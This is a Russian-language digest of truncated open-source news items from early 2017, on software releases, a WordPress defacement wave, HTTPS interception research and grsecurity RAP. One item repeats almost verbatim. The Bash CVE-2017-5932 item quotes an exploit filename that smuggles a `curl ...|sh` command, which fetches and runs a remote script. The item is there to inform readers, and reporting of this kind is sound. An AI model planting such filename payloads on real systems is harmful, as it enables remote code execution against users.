Доступны корректирующие обновления для всех поддерживаемых веток PostgreSQL: 9.6.2, 9.5.6, 9.4.11, 9.3.16 и 9.2.20, в которых представлена порция исправлений ошибок, в том числе устранены проблемы, которые могут привести к повреждению данных. Выпуск обновлений для ветки 9.2 продлится до сентября 2017 г., 9.3 до сентября 2018 г., 9.4 до декабря 2019 г., 9.5 до января 2021 г., 9.6 — до сентября 2021 года. Из наиболее важных исправлений отмечается устранение ошибки, которая могла привести к некорректному построению индекса при выполнении операции «CREATE INDEX CONCURRENTLY» для ранее не индексированного столбца, если в момент выполнения команды осуществляется обновление данных в строках индексируемой таблицы. Другим … Читать далее Обновление PostgreSQL 9.6.2, 9.5.6, 9.4.11, 9.3.16 и 9.2.20

Майкл Катандзаро (Michael Catanzaro), один из разработчиков web-браузера Epiphany (GNOME Web), опубликовал отчёт об актуальности пакетов с браузерным движком WebKit в дистрибутивах Linux. Майкл попытался оценить изменение ситуации спустя год, после поднятия темы о поставке в большинстве дистрибутивов устаревших версий портов WebKit (WebKitGTK+, QtWebKit и WebKitEFL), содержащих неисправленные опасные уязвимости. В целом отмечается значительное улучшение ситуации с безопасностью пакетов с портами WebKit. Наибольшим достижением можно считать налаживание процесса обновления WebKitGTK+ в Ubuntu. Актуальный выпуск WebKitGTK+ 2.14.3, в котором было устранено 13 уязвимостей, доставлен пользователям Ubuntu 16.04/16.10, Fedora 24/25 и Arch Linux. В прошлых LTS-ветках Ubuntu 14.04 и 12.04, а также … Читать далее Оценка безопасности WebKit в дистрибутивах Linux

После года разработки состоялся релиз Cheerp 1.3 (бывший Duetto), открытого инструментария для разработки клиентских и серверных web-приложений на языке C++, а также для портирования существующих C++ программ для работы в Web-браузере. Код распространяется под свободной лицензией UI/NCSA, также используемой в проекте LLVM. Библиотеки поставляются под лицензией GPLv2+. По своей сути Cheerp напоминает систему Emscripten и также использует наработки LLVM для обеспечения компиляции кода C++ в представление на языке JavaScript. Ключевым отличием Cheerp от Emscripten является ориентация на достижении более высокой производительности получаемого JavaScript-кода и предоставление средств для использования из С++ программ всех возможностей DOM, браузерного API и HTML5, в том … Читать далее Релиз Cheerp 1.3, компилятора C++ в JavaScript

Состоялся релиз дистрибутива NethServer 7, предлагающего модульное решение для быстрого развёртывания серверов в небольших офисах или на предприятиях среднего размера. Дистрибутив основан на пакетной базе CentOS 7 и предоставляет web-интерфейс для управления доступными серверными компонентами. Размер установочного образа 755 Мб. Для ознакомления с возможностями интерфейса предоставляется online-демонстрация. Наработки проекта распространяются под свободными лицензиями. Пользователю предлагаются готовые модули для организации работы почтового сервера (Postfix, Dovecot, Amavis, ClamAV + web-клиент Roundcube), системы совместной работы (SOGo), межсетевого экрана (Shorewall), web-сервера (LAMP), файлового сервера (Samba), фильтрующего прокси (Squid, ClamAV и SquidGuard), VPN-сервера (OpenVPN, L2TP), облачного хранилища (ownCloud) и систем обнаружения и предотвращения вторжений. Установка … Читать далее Доступен серверный дистрибутив NethServer 7

В свежей эксперментальной сборке Windows 10 (Windows 10 Insider Preview Build 15025) проведена очередная модернизация прослойки WSL («Windows Subsystem for Linux»), обеспечивающей трансляцию системных вызовов Linux в системные вызовы Windows и позволяющей запускать приложения Linux в Windows. Наиболее интересным следствием такой модернизация стала возможность запустить немодифицированную 64-разрядную сборку Wine (пакет wine64-development) в Windows и использования свободной реализации Windows API без применения ограниченной по функциональности сборки WineOnWindows. Wine на лету транслирует Windows API в системные вызовы POSIX, которые затем прослойкой WSL транслируются обратно в вызовы Windows API. Читать далее В Windows 10 продемонстрирован запуск Wine

Грег Кроа-Хартман (Greg Kroah-Hartman), отвечающий за поддержку стабильной ветки ядра Linux, представил последнее обновление LTS-ветки ядра 3.18.48. Релиз ядра 3.18 был выпущен в декабре 2014 года и поддерживался более двух лет. Отныне выпуск обновлений для данной ветки ядра прекращён и пользователям рекомендуется перейти на актуальные LTS-ветки 4.4 или 4.9, которые будут поддерживаться до февраля 2018 и января 2019 г. Сообщается, что несмотря на окончание времени жизни ветка 3.18 продолжает использоваться в некоторых актуальных прошивках на базе платформы Android и ChromeOS, но поддерживать портирование исправлений с устранением уязвимостей для ядра Linux 3.18 теперь придётся самим производителям. Кроме веток 4.4 и 4.9 … Читать далее Прекращена поддержка LTS-ветки ядра Linux 3.18

Компания Jolla, основанная бывшими сотрудниками Nokia с целью разработки новых смартфонов, построенных на базе Linux-платформы MeeGo, выпустила обновление операционной системы Sailfish 2.1.0. Sailfish использует графический стек на базе Wayland и библиотеки Qt5, системное окружение построено на основе Mer (форк MeeGo) и пакетов Mer-дистрибутива Nemo. Прошивки на базе новой ОС пока распространяются только для участников программы раннего доступа к релизам (принять участие в тестировании можно зарегистрировавшись на сайте Jolla). Сборки подготовлены для устройств Jolla 1, Jolla C и Jolla Tablet. Основные новшества: Начальная поддержка 64-разряной архитектуры Aarch64 (ARMv8); Обновление фреймворка Qt до версии 5.6; Экспериментальная поддержка Bluetooth-стека Bluez5 (5.43). По умолчанию … Читать далее Выпуск мобильной ОС Sailfish 2.1

Спустя менее недели с момента публикации информации о критической уязвимости в реализации REST API в системе управления web-контентом WordPress, отмечается волна автоматизированных атак, в результате которых осуществляется дефейс страниц или размещение SEO-спама. Жертвами атаки становятся пользователи ветки WordPress 4.7, не установившие обновление 4.7.2. Одна из атак по дефейсу через уязвимость в REST API уже затронула 127 тысяч страниц (вчера было 95 тысяч, позавчера — 66 тысяч). Интересно, что в число жертв атаки попал официальный сайт новостей проекта openSUSE — news.opensuse.org, некоторые страницы которого были заменены на сообщение с флагом Курдистана. Это не первый взлом сайтов проекта, в 2014 году успешно … Читать далее Через уязвимость в WordPress атакующие подменили страницы сайта openSUSE

Руководитель компании Jolla опубликовал обзор достижений 2016 года и планов на 2017 год. Среди намеченных событий отмечается намерение открыть в ближайшие месяцы исходные тексты штатных мобильных приложений и интерфейса пользователя платформы Sailfish. Напомним, что несмотря на то, что Sailfish использует наработки ряда свободных проектов, таких как ядро Linux, графический стек на базе Wayland, библиотеку Qt5, системное окружение Mer (форк MeeGo) и пакеты Mer-дистрибутива Nemo, проприетарными остаются пользовательская оболочка, базовые мобильные приложения, QML-компоненты построения графического интерфейса Silica, прослойка для запуска Andrоid-приложений, движок умного ввода текста и система синхронизации данных. Читать далее Компания Jolla готовит открытие кода приложений и графического интерфейса Sailfish

Компания Google опубликовала выпуск операционной системы Chrome OS 56, основанной на ядре Linux, системном менеджере upstart, сборочном инструментарии ebuild/portage, открытых компонентах и web-браузере Chrome 56. Пользовательское окружение Chrome OS ограничивается web-браузером, а вместо стандартных программ задействованы web-приложения, тем не менее, Chrome OS включает в себя полноценный многооконный интерфейс, рабочий стол и панель задач. Сборка Chrome OS 56 доступна для всех актуальных моделей Chromebook, за исключением ASUS Chromebook Flip C100PA, Google Chromebook Pixel (2015) и Acer Chromebook R11. Энтузиастами сформированы неофициальные сборки для обычных компьютеров с процессорами x86, x86_64 и ARM. Исходные тексты распространяются под свободной лицензией Apache 2.0. Основные изменения … Читать далее Выпуск операционной системы Chrome OS 56

Компания Google представила Android Wear 2.0, редакцию платформы Android для носимых устройств, таких как умные часы. Платформа предоставляет механизмы для обмена и репликации данных между карманными и носимыми устройствами, систему управления голосом, средства для синхронизации уведомлений, возможности для обмена сообщениями и функции для занятия фитнесом. В новой версии значительно переработан интерфейс, в котором учтены пожелания пользователей и разработчиков. Ключевым новшеством Android Wear 2.0 являются настраиваемые оболочки-циферблаты с поддержкой размещения виджетов. Задействована концепция Material Design, полностью переработаны система уведомлений и меню запуска приложений. Добавлена виртуальная клавиатура, реализована поддержка распознавания рукописного ввода, расширены средства голосового управления, интегрирован голосовой помощник («Ok Google») и … Читать далее Выпуск платформы для носимых устройств Android Wear 2.0

Разработчики из команды Google Brain, занимающейся исследованиями в области искусственного интеллекта, нейронных сетей и машинного обучения, опубликовали свои наработки в области восстановления пикселизированных изображений, детализация которых была утеряна в результате масштабирования. Предложенная система позволяет с достаточно высокой точностью реконструировать возможное изображение даже когда имеются сведения всего о нескольких десятках пикселей. Например, на приведённом выше изображении показан результат воссоздания изображения, уменьшенного до 8×8 пикселей. Во втором столбце размещён предложенный системой вариант, а в третьем столбце эталонное изображение, из которого был создан исходный вариант 8×8. Метод основан на комбинировании двух нейронных сетей. Первая сеть решает задачу сопоставления восстанавливаемого изображения 8×8 с эталонной … Читать далее Google представил технику реконструкции пикселизированных изображений

Представлен выпуск проприетарного web-браузера Vivaldi 1.7, разрабатываемого на базе движка Chromium и продолжающего развитие идей классического браузера Opera, предоставляя широкий спектр возможностей, включая удобную систему группировки вкладок, боковую панель, конфигуратор с большим числом настроек, режим блокировки изображений и нежелательного контента, систему ведения заметок, режим горизонтального отображения вкладок. Интерфейс браузера написан на языке JavaScript с использованием библиотеки React, платформы Node.js, Browserify и различных готовых NPM-модулей. Сборки Vivaldi подготовлены для Linux, Windows и macOS. Для прошлых выпусков проект распространяет под открытой лицензией исходные тексты изменений к Chromium. Реализация интерфейса Vivaldi написана на JavaScript, доступна в исходных текстах, но под проприетарной лицензией. Основные … Читать далее Выпуск web-браузера Vivaldi 1.7

Группа, в которую вошли исследователи из ряда известных университетов, а также представители Mozilla, Cloudflare и Google, провела анализ распространения методов локального перехвата HTTPS-трафика и влияния такого перехвата на сетевую безопасность. Результаты превзошли ожидания исследователей, оказалось, что 4-11% HTTPS-трафика перехватывается и анализируется сторонним ПО на стороне клиента (антивирусное ПО, межсетевые экраны), при этом в большинстве случаев подобный перехват приводит к уменьшению уровня защиты соединения. Под локальным перехватом подразумеваются случаи анализа HTTPS-трафика с использованием программного обеспечения, установленного на системе пользователя (например, антивирусное ПО), или применением корпоративных шлюзов инспектирования трафика, работающих в виде прокси. Подобные системы перехватывают обращение клиента, затем от своего лица … Читать далее Исследование негативного влияния на безопасность локального перехвата HTTPS-трафика

В командном интерпретаторе Bash выявлена уязвимость (CVE-2017-5932), которая может быть использована для выполнения своего кода при выполнении операций автодополнения ввода клавишей табуляция. Проблема затрагивает ветку Bash 4.4. Исправление пока доступно только в виде патча. Проблема вызвана ошибкой в коде экранирования спецсимволов и связана с неверной обработкой наличия разных типов кавычек. Для эксплуатации достаточно создать файл со специально оформленным именем. При попытке выполнения операции автодополнения для данного файла будут выполнены определённые злоумышленником инструкции командного интерпретаора. Например, для эксплуатации достаточно создать файл с именем: длинная_строка «`curl ссылка_скрипт|sh` и добиться его обработки в строке ввода при нажатии табуляции. Читать далее Уязвимость в реализации автодополнения ввода в Bash

Разработчики из команды Google Brain, занимающейся исследованиями в области искусственного интеллекта, нейронных сетей и машинного обучения, опубликовали свои наработки в области восстановления пикселизированных изображений, детализация которых была утеряна в результате масштабирования. Предложенная система позволяет с достаточно высокой точностью воссоздавать возможное изображение даже когда имеются сведения всего о нескольких десятках пикселей. Например, на приведённом выше изображении показан результат восстановления изображения, уменьшенного до 8×8 пикселей. Во втором столбце размещён предложенный системой вариант, а в третьем столбце эталонное изображение, из которого был создан исходный вариант 8×8. Метод основан на комбинировании двух нейронных сетей. Первая сеть решает задачу сопоставления восстанавливаемого изображения 8×8 с эталонной … Читать далее Google представил технику воссоздания пикселизированных изображений

Компания Canoniсal опубликовала обновление прошивки OTA-15 (over-the-air) для смартфонов и планшетов на базе платформы Ubuntu Touch. Обновление автоматически будет доставлено пользователям смартфонов Meizu MX4/PRO 5, Nexus 4, Nexus 7 и Bq Aquaris E5/E4.5/M10, укомплектованных прошивкой на базе Ubuntu. С момента прошлого выпуска список поддерживаемых устройств не изменился. Выпуск позиционируется как обновление с устранением ошибок и проблем с безопасностью. Web-движок Oxide (предоставляет QtQuick WebView на базе ChromiumOxide) обновлён до версии 1.19.7. Во встроенном web-браузере решены проблемы с загрузкой некоторых страниц и переходом в спящий режим во время воспроизведения видео и звука. На устройствах BQ E5 решены проблемы с инвертированием передней камеры. … Читать далее Обновление прошивки Ubuntu Touch OTA-15

Доступен выпуск проприетарного браузера Opera 43, основанного на кодовой базе Chromium. Сборки сформированы для платформ Linux, macOS и Windows. Основные новшества: Реализован режим упреждающей загрузки страницы, который во время набора в адресной строке предсказывает наиболее вероятный адрес, учитывая статистику прошлых операций, и начинает загрузку в фоне ещё до того как пользователь закончит ввод. Если прогноз был верным пользователь мгновенно получит запрошенную страницу. При этом браузер учитывает наиболее типичные для пользователя ошибки ввода и начинает загружать правильный сайт до того как пользователь исправит опечатку. Предварительная загрузка также действует не только при вводе в адресной строке, но и при указании на страницах … Читать далее Выпуск web-браузера Opera 43

Проект grsecurity представил первый выпуск набора патчей с реализацией механизма защиты RAP (Reuse Attack Protector) для ядра Linux, позволяющего блокировать работу эксплоитов, основанных на технике заимствования кусков кода. Набор патчей включает всю запланированную функциональность и опубликован под лицензией GPLv2 в публичной тестовой ветке grsecurity для ядра Linux 4.9 (стабильные ветки grsecurity распространяются платно). Техника заимствования кусков кода используется для эксплуатации переполнений буфера в условиях, когда в страницах памяти стека и буфера установлен запрет на исполнение кода. Для организации выполнения кода атакующего в таких условиях логика выполнения shell-кода формируется с использованием методов возвратно-ориентированного программирования (ROP) — атакующий не пытается разместить свой … Читать далее Проект grsecurity опубликовал реализацию механизма защиты RAP для ядра Linux

Компания CodeWeavers выпустила релиз пакета Crossover 16.1, основанного на коде Wine 2.0 и предназначенного для выполнения программ и игр, написанных для платформы Windows. CodeWeavers входит в число ключевых участников проекта Wine, спонсирует его разработку и возвращает в проект все новшества, реализованные для своих коммерческих продуктов. Исходные тексты открытых компонентов CrossOver 16.1 можно загрузить на данной странице. Из изменений в новом выпуске отмечается реализация поддержки пакета управления финансами Quicken 2017, устранение проблем, мешающих завершению процесса активации Microsoft Office 2010, и устранение ошибки, препятствующей нормальному накоплению и отображению статистики на экране с настройками. Читать далее Релиз CrossOver 16.1 для Linux и macOS

Компания Intel объявила об успешной сертификации в Khronos Group реализации графических API OpenGL 4.5, OpenGL ES 3.2 и Vulkan 1.0 в своих открытых драйверах для Linux. После проверки соответствия представленных открытых реализаций на предмет соответствия требованиям стандартов Linux-драйверы Intel были добавлены в список продуктов, официально совместимых с OpenGL 4.5, OpenGL ES 3.2 и Vulkan 1.0. Тестирование проведено с использованием Mesa 13 и DRM-компонентов (Direct Rendering Manager) ядер Linux 4.8 и 4.9. Читать далее Компания Intel сертифицировала в Khronos Group поддержку OpenGL 4.5 в Linux-драйверах